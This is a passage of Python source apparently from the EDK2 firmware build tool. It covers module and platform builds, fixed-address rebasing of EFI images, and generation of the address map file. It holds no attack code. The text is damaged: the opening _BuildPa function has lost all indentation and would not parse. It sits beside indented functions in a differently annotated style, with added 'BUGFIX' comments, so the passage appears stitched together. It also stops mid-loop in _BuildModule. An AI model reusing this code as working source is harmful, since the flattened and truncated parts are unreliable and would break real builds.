# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
    """Build a module or platform.

    Generates AutoGen code and makefiles as required by Target, then
    dispatches on Target: make the object, run GenFds, launch SecMain,
    or remove the build directory.

    @param Target               Build target name ('', 'all', 'fds', 'genc',
                                'genmake', 'run', 'libraries', 'cleanall', ...)
    @param AutoGenObject        Module or Platform AutoGen object to build
    @param CreateDepsCodeFile   Also generate code for dependent modules/libraries
    @param CreateDepsMakeFile   Also generate makefiles for dependent modules/libraries
    @param BuildModule          True to actually invoke the make command
    @retval True on success, False when AutoGenObject is None
            (hard failures are reported via EdkLogger.error, which raises)
    """
    if AutoGenObject is None:
        return False

    # skip file generation for cleanxxx targets, run and fds target
    if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
        # for target which must generate AutoGen code and makefile
        if not self.SkipAutoGen or Target == 'genc':
            self.Progress.Start("Generating code")
            AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
            self.Progress.Stop("done!")
        if Target == "genc":
            return True

        if not self.SkipAutoGen or Target == 'genmake':
            self.Progress.Start("Generating makefile")
            AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
            self.Progress.Stop("done!")
        if Target == "genmake":
            return True
    else:
        # always recreate top/platform makefile when clean, just in case of inconsistency
        AutoGenObject.CreateCodeFile(False)
        AutoGenObject.CreateMakeFile(False)

    if EdkLogger.GetLevel() == EdkLogger.QUIET:
        EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))

    BuildCommand = AutoGenObject.BuildCommand
    if BuildCommand is None or len(BuildCommand) == 0:
        EdkLogger.error("build", OPTION_MISSING,
                        "No build command found for this module. "
                        "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                        ExtraData=str(AutoGenObject))

    # build modules
    if BuildModule:
        if Target != 'fds':
            BuildCommand = BuildCommand + [Target]
        AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
        self.CreateAsBuiltInf()
        return True

    # genfds
    if Target == 'fds':
        LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
        return True

    # run
    if Target == 'run':
        RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
        # BUGFIX: was '.\SecMain' — '\S' is an invalid escape sequence
        # (DeprecationWarning, later SyntaxWarning). Same bytes, explicit escape.
        Command = '.\\SecMain'
        os.chdir(RunDir)
        LaunchCommand(Command, RunDir)
        return True

    # build library
    if Target == 'libraries':
        pass

    # not build modules

    # cleanall
    if Target == 'cleanall':
        try:
            #os.rmdir(AutoGenObject.BuildDir)
            RemoveDirectory(AutoGenObject.BuildDir, True)
        except WindowsError as X:
            # NOTE(review): WindowsError is undefined on non-Windows Python 3;
            # this handler only matters on Windows hosts — confirm intent.
            EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
    return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule(self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset=True, ModeIsSmm=False):
    """Rebase module images and record function addresses for ModuleList.

    For each module, invokes GenFw to rebase (or, for SMM, re-address) both
    the output and debug images, parses the linker .map file for function
    symbols, and appends a human-readable address map to MapBuffer.

    @param MapBuffer     text buffer receiving the address map
    @param BaseAddress   starting address; decremented per module when not SMM,
                         incremented when SMM (SMRAM is allocated base-to-top)
    @param ModuleList    mapping of INF file -> module image info
    @param AddrIsOffset  True to print addresses as negative offsets
    @param ModeIsSmm     True when rebasing SMM modules inside SMRAM
    """
    if ModeIsSmm:
        AddrIsOffset = False
    for InfFile in ModuleList:
        # one dot per module as a progress indicator
        sys.stdout.write(".")
        sys.stdout.flush()
        ModuleInfo = ModuleList[InfFile]
        ModuleName = ModuleInfo.BaseName
        ModuleOutputImage = ModuleInfo.Image.FileName
        ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
        # for SMM module in SMRAM, the SMRAM will be allocated from base to top.
        if not ModeIsSmm:
            BaseAddress = BaseAddress - ModuleInfo.Image.Size
            #
            # Update Image to new BaseAddress by GenFw tool
            #
            LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
            LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
        else:
            #
            # Set new address to the section header only for SMM driver.
            #
            LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
            LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
        #
        # Collect function address from Map file
        #
        ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
        FunctionList = []
        if os.path.exists(ImageMapTable):
            OrigImageBaseAddress = 0
            # BUGFIX: use a context manager; the old code also called
            # ImageMap.close() a second time after the MapBuffer writes,
            # which raised NameError when the first module had no .map file.
            with open(ImageMapTable, 'r') as ImageMap:
                for LinStr in ImageMap:
                    if len(LinStr.strip()) == 0:
                        continue
                    #
                    # Get the preferred address set on link time.
                    #
                    if LinStr.find('Preferred load address is') != -1:
                        StrList = LinStr.split()
                        OrigImageBaseAddress = int(StrList[len(StrList) - 1], 16)

                    StrList = LinStr.split()
                    if len(StrList) > 4:
                        # column 3 is 'f'/'F' for function symbols in the map file
                        if StrList[3] == 'f' or StrList[3] == 'F':
                            Name = StrList[1]
                            RelativeAddress = int(StrList[2], 16) - OrigImageBaseAddress
                            FunctionList.append((Name, RelativeAddress))
                            if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
                                #
                                # Get the real entry point address for IPF image.
                                #
                                ModuleInfo.Image.EntryPoint = RelativeAddress
        #
        # Add general information.
        #
        if ModeIsSmm:
            MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
        elif AddrIsOffset:
            MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
        else:
            MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
        #
        # Add guid and general section information.
        #
        TextSectionAddress = 0
        DataSectionAddress = 0
        for SectionHeader in ModuleInfo.Image.SectionHeaderList:
            if SectionHeader[0] == '.text':
                TextSectionAddress = SectionHeader[1]
            elif SectionHeader[0] in ['.data', '.sdata']:
                DataSectionAddress = SectionHeader[1]
        if AddrIsOffset:
            MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
        else:
            MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
        #
        # Add debug image full path.
        #
        MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
        #
        # Add function addresses
        #
        for Function in FunctionList:
            if AddrIsOffset:
                MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
            else:
                MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
        #
        # for SMM module in SMRAM, the SMRAM will be allocated from base to top.
        #
        if ModeIsSmm:
            BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer(self, MapBuffer, Wa, ModuleList):
    """Collect MAP information of all FVs into MapBuffer.

    Reads every <FvName>.Fv.map under Wa.FvDir, replaces leading module
    GUIDs with module names (looked up by upper-cased GUID in ModuleList)
    and appends the debug-image path after '(GUID=...' lines. Only runs
    when a FDF file is in use.

    @param MapBuffer   text buffer the map lines are appended to
    @param Wa          WorkspaceAutoGen object (provides FvDir, FdfProfile)
    @param ModuleList  dict of upper-cased module GUID -> ModuleAutoGen
    """
    if self.Fdf:
        # First get the XIP base address for FV map file.
        # BUGFIX: raw strings for regex — '\(' in a plain literal is an
        # invalid escape sequence (DeprecationWarning since Python 3.6).
        GuidPattern = re.compile(r"[-a-fA-F0-9]+")
        GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
        for FvName in Wa.FdfProfile.FvDict:
            FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
            if not os.path.exists(FvMapBuffer):
                continue
            # 'with' guarantees the map file is closed on any exit path
            with open(FvMapBuffer, 'r') as FvMap:
                # skip FV size information (four header lines)
                FvMap.readline()
                FvMap.readline()
                FvMap.readline()
                FvMap.readline()
                for Line in FvMap:
                    MatchGuid = GuidPattern.match(Line)
                    if MatchGuid is not None:
                        #
                        # Replace GUID with module name
                        #
                        GuidString = MatchGuid.group()
                        if GuidString.upper() in ModuleList:
                            Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
                    MapBuffer.write(Line)
                    #
                    # Add the debug image full path.
                    #
                    MatchGuid = GuidName.match(Line)
                    if MatchGuid is not None:
                        GuidString = MatchGuid.group().split("=")[1]
                        if GuidString.upper() in ModuleList:
                            MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer(self, MapBuffer, ModuleList):
    """Collect MAP information of all modules and rebase them.

    Classifies every non-library module into PEI/BOOT/RUNTIME/SMM lists,
    computes the fixed load addresses below self.LoadFixAddress, patches
    the page-size PCDs into images that carry them, and delegates the
    actual rebasing and map generation to _RebaseModule.

    @param MapBuffer   text buffer receiving the address map
    @param ModuleList  dict of upper-cased module GUID -> ModuleAutoGen
    """
    sys.stdout.write("Generate Load Module At Fix Address Map")
    sys.stdout.flush()
    PatchEfiImageList = []
    PeiModuleList = {}
    BtModuleList = {}
    RtModuleList = {}
    SmmModuleList = {}
    PeiSize = 0
    BtSize = 0
    RtSize = 0
    # reserve 4K size in SMRAM to make SMM module address not from 0.
    SmmSize = 0x1000
    IsIpfPlatform = False
    if 'IPF' in self.ArchList:
        IsIpfPlatform = True
    for ModuleGuid in ModuleList:
        Module = ModuleList[ModuleGuid]
        GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)

        OutputImageFile = ''
        for ResultFile in Module.CodaTargetList:
            if str(ResultFile.Target).endswith('.efi'):
                #
                # module list for PEI, DXE, RUNTIME and SMM
                #
                OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
                ImageClass = PeImageClass(OutputImageFile)
                if not ImageClass.IsValid:
                    EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
                ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
                if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
                    PeiModuleList[Module.MetaFile] = ImageInfo
                    PeiSize += ImageInfo.Image.Size
                elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
                    BtModuleList[Module.MetaFile] = ImageInfo
                    BtSize += ImageInfo.Image.Size
                elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
                    RtModuleList[Module.MetaFile] = ImageInfo
                    # IPF runtime driver needs to be at 2 page alignment.
                    # BUGFIX: floor division — '/' yields a float in Python 3.
                    if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
                        ImageInfo.Image.Size = (ImageInfo.Image.Size // 0x2000 + 1) * 0x2000
                    RtSize += ImageInfo.Image.Size
                elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
                    SmmModuleList[Module.MetaFile] = ImageInfo
                    SmmSize += ImageInfo.Image.Size
                    if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                        PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
                        # for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
                        if int(PiSpecVersion, 16) < 0x0001000A:
                            BtModuleList[Module.MetaFile] = ImageInfo
                            BtSize += ImageInfo.Image.Size
                break
        #
        # EFI image is final target.
        # Check EFI image contains patchable FixAddress related PCDs.
        #
        if OutputImageFile != '':
            ModuleIsPatch = False
            for Pcd in Module.ModulePcdList:
                if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                    ModuleIsPatch = True
                    break
            if not ModuleIsPatch:
                for Pcd in Module.LibraryPcdList:
                    if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                        ModuleIsPatch = True
                        break

            if not ModuleIsPatch:
                continue
            #
            # Module includes the patchable load fix address PCDs.
            # It will be fixed up later.
            #
            PatchEfiImageList.append(OutputImageFile)

    #
    # Get Top Memory address
    #
    ReservedRuntimeMemorySize = 0
    TopMemoryAddress = 0
    if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
        TopMemoryAddress = 0
    else:
        TopMemoryAddress = self.LoadFixAddress
        if TopMemoryAddress < RtSize + BtSize + PeiSize:
            EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
        # Make IPF runtime driver at 2 page alignment.
        if IsIpfPlatform:
            ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
            RtSize = RtSize + ReservedRuntimeMemorySize

    #
    # Patch FixAddress related PCDs into EFI image
    #
    for EfiImage in PatchEfiImageList:
        EfiImageMap = EfiImage.replace('.efi', '.map')
        if not os.path.exists(EfiImageMap):
            continue
        #
        # Get PCD offset in EFI image by GenPatchPcdTable function
        #
        PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
        #
        # Patch real PCD value by PatchPcdValue tool
        #
        # BUGFIX throughout: page counts use '//' (floor division); with '/'
        # Python 3 produces floats, so str() yields e.g. '16.0' and the
        # '0x%x' formats below raise TypeError.
        for PcdInfo in PcdTable:
            ReturnValue = 0
            if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile(EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str(PeiSize // 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile(EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str(BtSize // 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile(EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str(RtSize // 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len(SmmModuleList) > 0:
                ReturnValue, ErrorInfo = PatchBinaryFile(EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str(SmmSize // 0x1000))
            if ReturnValue != 0:
                EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)

    MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
    MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
    MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
    if len(SmmModuleList) > 0:
        MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))

    PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
    BtBaseAddr = TopMemoryAddress - RtSize
    RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize

    self._RebaseModule(MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
    self._RebaseModule(MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
    self._RebaseModule(MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
    self._RebaseModule(MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
    MapBuffer.write('\n\n')
    sys.stdout.write("\n")
    sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile(self, MapBuffer, Wa):
    """Flush the accumulated address map to <BuildDir>/<PlatformName>.map.

    Writes the buffer contents only when they differ from what is already
    on disk, then closes the buffer. Prints the map location when a fixed
    load address was requested.
    """
    #
    # Compute the map file path from the workspace build directory.
    #
    MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
    #
    # Persist the address map (no-op if file content is unchanged).
    #
    SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
    MapBuffer.close()
    if self.LoadFixAddress != 0:
        sys.stdout.write("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
        sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
    """Build the active platform for every build target and tool chain
    (single-threaded path).

    For each (target, toolchain) pair: create the workspace AutoGen, build
    every platform module via _BuildPa, and — for full/fds builds — emit
    the Load-Module-At-Fixed-Address MAP file when that feature is enabled.
    """
    # Text buffer for the address map; the map is written as str.
    # BUGFIX: was BytesIO('') which raises TypeError under Python 3
    # (BytesIO takes bytes) and would reject the str writes anyway.
    from io import StringIO
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            self.Progress.Stop("done!")

            # Add ffs build to makefile
            CmdListDict = {}
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()

            for Arch in Wa.ArchList:
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                    if Ma is None:
                        continue
                    self.BuildModules.append(Ma)
                self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = Arch
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = StringIO()
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                if self.Fdf:
                    #
                    # create FDS again for the updated EFI image
                    #
                    self._Build("fds", Wa)
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
    """Build the single module given by self.ModuleFile for every build
    target, tool chain and architecture.

    Module build still needs the platform AutoGen for context; module make
    units are scheduled through BuildTask. For 'fds' builds with an FDF,
    the fixed-address MAP file is regenerated afterwards.
    """
    # BUGFIX: text buffer for the address map — was BytesIO('') which
    # raises TypeError under Python 3 and cannot accept the str writes.
    from io import StringIO
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            #
            # module build needs platform build information, so get platform
            # AutoGen first
            #
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress,
                    self.ModuleFile
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()
            self.Progress.Stop("done!")
            MaList = []
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
                        Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                        if Ma is None:
                            continue
                        MaList.append(Ma)
                        if Ma.CanSkipbyHash():
                            self.HashSkipModules.append(Ma)
                            continue
                        # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                        if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                            # for target which must generate AutoGen code and makefile
                            if not self.SkipAutoGen or self.Target == 'genc':
                                self.Progress.Start("Generating code")
                                Ma.CreateCodeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genc":
                                return True
                            if not self.SkipAutoGen or self.Target == 'genmake':
                                self.Progress.Start("Generating makefile")
                                if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                    Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                    del CmdListDict[Module.File, Arch]
                                else:
                                    Ma.CreateMakeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genmake":
                                return True
                        self.BuildModules.append(Ma)
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
